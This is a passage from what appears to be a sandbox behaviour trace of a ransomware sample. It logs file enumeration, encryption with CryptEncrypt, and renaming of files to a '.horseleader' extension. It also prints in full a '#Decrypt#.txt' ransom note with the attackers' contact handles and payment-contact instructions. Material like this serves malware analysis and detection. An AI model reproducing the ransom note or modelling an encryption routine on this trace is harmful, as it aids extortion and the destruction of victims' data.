pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.134] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.135] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 79 [0248.135] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0248.135] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=18380) returned 1 [0248.135] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x47cc, lpOverlapped=0x0) returned 1 [0248.160] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb834, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.161] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x47cc, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x47cc, lpOverlapped=0x0) returned 1 [0248.161] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.161] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.161] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.161] CloseHandle (hObject=0x1a4) returned 1 [0248.161] GetProcessHeap () returned 0x780000 [0248.161] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.161] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG.horseleader") returned 91 [0248.161] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png.horseleader")) returned 1 [0248.162] GetProcessHeap () returned 0x780000 [0248.163] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.163] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x47cc, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0248.163] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.163] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\#Decrypt#.txt") returned 80 [0248.163] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.163] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0248.164] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.165] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0248.165] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.165] CloseHandle (hObject=0x158) returned 1 [0248.165] GetProcessHeap () returned 0x780000 [0248.165] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0248.165] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d416d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d416d30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="SUMIPNTG", cAlternateFileName="")) returned 1 [0248.165] lstrcmpiW (lpString1="SUMIPNTG", lpString2="Windows") returned -1 [0248.165] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG") returned 68 [0248.165] lstrcmpW (lpString1="SUMIPNTG", lpString2=".") returned 1 [0248.165] lstrcmpW (lpString1="SUMIPNTG", lpString2="..") returned 1 [0248.165] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.166] GetProcessHeap () returned 0x780000 [0248.166] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0248.166] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\*") returned 70 [0248.166] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d416d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d416d30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0248.166] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.166] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\.") returned 70 [0248.166] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.166] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d416d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d416d30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.166] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.166] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\..") returned 71 [0248.166] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0248.166] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0248.166] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x137f, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0248.166] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0248.167] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 80 [0248.167] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0248.168] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0248.168] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0248.168] lstrlenW (lpString=".testttjffg") returned 11 [0248.168] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0248.168] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.168] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.168] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.169] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 80 [0248.169] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0248.169] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=4991) returned 1 [0248.169] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x137f, lpOverlapped=0x0) returned 1 [0248.171] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffec81, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.171] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x137f, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x137f, lpOverlapped=0x0) returned 1 [0248.171] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.172] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.172] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.172] CloseHandle (hObject=0x1a4) returned 1 [0248.172] GetProcessHeap () returned 0x780000 [0248.172] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.172] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF.horseleader") returned 92 [0248.172] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif.horseleader")) returned 1 [0248.176] GetProcessHeap () returned 0x780000 [0248.176] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.176] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f7a6700, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x6d416d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2f7a6700, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x19e14, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SUMIPNTG.ELM", cAlternateFileName="")) returned 1 [0248.177] lstrcmpiW (lpString1="SUMIPNTG.ELM", lpString2="Windows") returned -1 [0248.177] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.ELM") returned 81 [0248.177] StrStrIW (lpFirst="SUMIPNTG.ELM", lpSrch=".horseleader") returned 0x0 [0248.177] lstrcmpW (lpString1="SUMIPNTG.ELM", lpString2="#Decrypt#.txt") returned 1 [0248.177] lstrcmpW (lpString1="SUMIPNTG.ELM", lpString2="_uninstalling_.png") returned 1 [0248.177] lstrlenW (lpString=".testttjffg") returned 11 [0248.177] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.ELM", lpSrch=".testttjffg") returned 0x0 [0248.177] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.177] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.177] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\sumipntg.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.178] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.ELM") returned 81 [0248.178] StrStrW (lpFirst="SUMIPNTG.ELM", lpSrch=".txt") returned 0x0 [0248.178] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=106004) returned 1 [0248.179] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.179] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.181] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.181] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.182] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xa70a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.182] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.183] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.183] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.183] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x14e14, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.183] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.183] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.184] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.184] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.184] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.184] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.184] CloseHandle (hObject=0x1a4) returned 1 [0248.184] GetProcessHeap () returned 0x780000 [0248.184] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.184] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.ELM.horseleader") returned 93 [0248.184] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\sumipntg.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\sumipntg.elm.horseleader")) returned 1 [0248.187] GetProcessHeap () returned 0x780000 [0248.187] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.187] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d416d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x22b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SUMIPNTG.INF", cAlternateFileName="")) returned 1 [0248.187] lstrcmpiW (lpString1="SUMIPNTG.INF", lpString2="Windows") returned -1 [0248.187] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.INF") returned 81 [0248.187] StrStrIW (lpFirst="SUMIPNTG.INF", lpSrch=".horseleader") returned 0x0 [0248.187] lstrcmpW (lpString1="SUMIPNTG.INF", lpString2="#Decrypt#.txt") returned 1 [0248.187] lstrcmpW (lpString1="SUMIPNTG.INF", lpString2="_uninstalling_.png") returned 1 [0248.187] lstrlenW (lpString=".testttjffg") returned 11 [0248.187] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.INF", lpSrch=".testttjffg") returned 0x0 [0248.187] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.188] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.188] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\sumipntg.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.188] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.INF") returned 81 [0248.188] StrStrW (lpFirst="SUMIPNTG.INF", 